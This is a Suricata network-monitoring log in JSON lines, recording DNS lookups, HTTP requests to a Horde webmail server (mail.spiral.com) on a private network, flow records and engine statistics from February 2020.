{"timestamp":"2020-02-29T00:21:56.692104+0000","flow_id":1686898580184385,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35597,"proto":"UDP","dns":{"type":"answer","id":26101,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:21:57.194158+0000","flow_id":1200270195341367,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52952,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/calendar.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":973},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/calendar.js","state":"CLOSED","stored":false,"size":3052,"tx_id":1}} {"timestamp":"2020-02-29T00:21:57.196504+0000","flow_id":2139845830940751,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52950,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/js\/task.js?v=839a6380454bbd865d6aa6063c84bc2b","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?tasklist=Rfr_4AJ1N_D9j1c0EJSzGmW&task=USVrSe9qzE2kdE7LezcHtyK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":689},"app_proto":"http","fileinfo":{"filename":"\/nag\/js\/task.js","state":"CLOSED","stored":false,"size":1698,"tx_id":2}} {"timestamp":"2020-02-29T00:21:58.000193+0000","event_type":"stats","stats":{"uptime":14970,"capture":{"kernel_packets":138459,"kernel_drops":0},"decoder":{"pkts":138517,"bytes":94977633,"invalid":193,"ipv4":136960,"ipv6":10,"ethernet":138517,"raw":0,"null":0,"sll":0,"tcp":131440,"udp":5312,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2857,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2873,"synack":2864,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":767,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2431,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2513}},"flow_mgr":{"closed_pruned":2830,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18762,"memcap":0}}} {"timestamp":"2020-02-29T00:22:01.001780+0000","flow_id":2248431190397810,"event_type":"flow","src_ip":"192.168.10.130","src_port":34900,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1118,"start":"2020-02-29T00:20:55.119666+0000","end":"2020-02-29T00:21:00.317204+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:05.000272+0000","event_type":"stats","stats":{"uptime":14977,"capture":{"kernel_packets":138827,"kernel_drops":0},"decoder":{"pkts":138841,"bytes":95215515,"invalid":194,"ipv4":137282,"ipv6":10,"ethernet":138841,"raw":0,"null":0,"sll":0,"tcp":131757,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":685,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2861,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2877,"synack":2868,"rst":1208,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":771,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:12.000227+0000","event_type":"stats","stats":{"uptime":14984,"capture":{"kernel_packets":139063,"kernel_drops":0},"decoder":{"pkts":139073,"bytes":95413784,"invalid":194,"ipv4":137514,"ipv6":10,"ethernet":139073,"raw":0,"null":0,"sll":0,"tcp":131989,"udp":5316,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2863,"ssn_memcap_drop":0,"pseudo":349,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2879,"synack":2870,"rst":1210,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":773,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":114},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:19.000183+0000","event_type":"stats","stats":{"uptime":14991,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2831,"new_pruned":17,"est_pruned":2491,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18845,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:20.000826+0000","flow_id":1653011270062210,"event_type":"flow","src_ip":"192.168.10.122","src_port":44867,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:19.118914+0000","end":"2020-02-29T00:17:19.227917+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:23.000273+0000","flow_id":24883672652726,"event_type":"flow","src_ip":"192.168.10.81","src_port":52938,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":30,"bytes_toserver":5358,"bytes_toclient":27904,"start":"2020-02-29T00:21:12.072630+0000","end":"2020-02-29T00:21:22.623690+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.001502+0000","flow_id":610635607832318,"event_type":"flow","src_ip":"192.168.10.81","src_port":52940,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2355,"bytes_toclient":3607,"start":"2020-02-29T00:21:17.456446+0000","end":"2020-02-29T00:21:22.599465+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002117+0000","flow_id":764176393698498,"event_type":"flow","src_ip":"192.168.10.81","src_port":52942,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":3359,"bytes_toclient":4267,"start":"2020-02-29T00:21:17.457922+0000","end":"2020-02-29T00:21:22.603314+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.002636+0000","flow_id":103172336909697,"event_type":"flow","src_ip":"192.168.10.81","src_port":52944,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":6,"bytes_toserver":1322,"bytes_toclient":1842,"start":"2020-02-29T00:21:17.589185+0000","end":"2020-02-29T00:21:22.603381+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:23.003183+0000","flow_id":1543210446686322,"event_type":"flow","src_ip":"192.168.10.81","src_port":52946,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1823,"bytes_toclient":2204,"start":"2020-02-29T00:21:17.591986+0000","end":"2020-02-29T00:21:22.601130+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:24.000896+0000","flow_id":1688526354854154,"event_type":"flow","src_ip":"192.168.10.122","src_port":34841,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:23.536842+0000","end":"2020-02-29T00:17:23.645551+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:26.000158+0000","event_type":"stats","stats":{"uptime":14998,"capture":{"kernel_packets":139166,"kernel_drops":0},"decoder":{"pkts":139172,"bytes":95498316,"invalid":194,"ipv4":137611,"ipv6":10,"ethernet":139172,"raw":0,"null":0,"sll":0,"tcp":132084,"udp":5318,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2864,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2880,"synack":2871,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1885,"ftp":0,"smtp":0,"tls":774,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2433,"failed_udp":115},"tx":{"http":4840,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2515}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2493,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18185,"memcap_state":0,"memcap_global":0},"http":{"memuse":18282,"memcap":0}}} {"timestamp":"2020-02-29T00:22:27.010384+0000","flow_id":256953625804596,"event_type":"flow","src_ip":"192.168.10.122","src_port":54415,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:26.393012+0000","end":"2020-02-29T00:17:26.501632+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003172+0000","flow_id":1424381571475841,"event_type":"flow","src_ip":"192.168.10.122","src_port":34842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.371073+0000","end":"2020-02-29T00:17:27.479187+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:28.003571+0000","flow_id":1466579625143878,"event_type":"flow","src_ip":"192.168.10.122","src_port":60762,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:27.159302+0000","end":"2020-02-29T00:17:27.267472+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:29.476921+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41150,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":59344,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:29.588304+0000","flow_id":1547093101856505,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41150,"proto":"UDP","dns":{"type":"answer","id":59344,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:29.724003+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088}} {"timestamp":"2020-02-29T00:22:30.000603+0000","flow_id":645583741745750,"event_type":"flow","src_ip":"192.168.10.122","src_port":51707,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:17:29.293462+0000","end":"2020-02-29T00:17:29.401593+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:22:31.987599+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8088},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47027,"tx_id":0}} {"timestamp":"2020-02-29T00:22:31.998142+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.109469+0000","flow_id":945608701983486,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59959,"proto":"UDP","dns":{"type":"answer","id":64994,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.243374+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488}} {"timestamp":"2020-02-29T00:22:32.262695+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24488},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:22:32.265743+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:22:32.277233+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:22:32.277645+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} {"timestamp":"2020-02-29T00:22:32.301116+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.301648+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:22:32.316886+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.317655+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} {"timestamp":"2020-02-29T00:22:32.325552+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/js\/dragdrop2.js","state":"CLOSED","stored":false,"size":24731,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.331346+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} 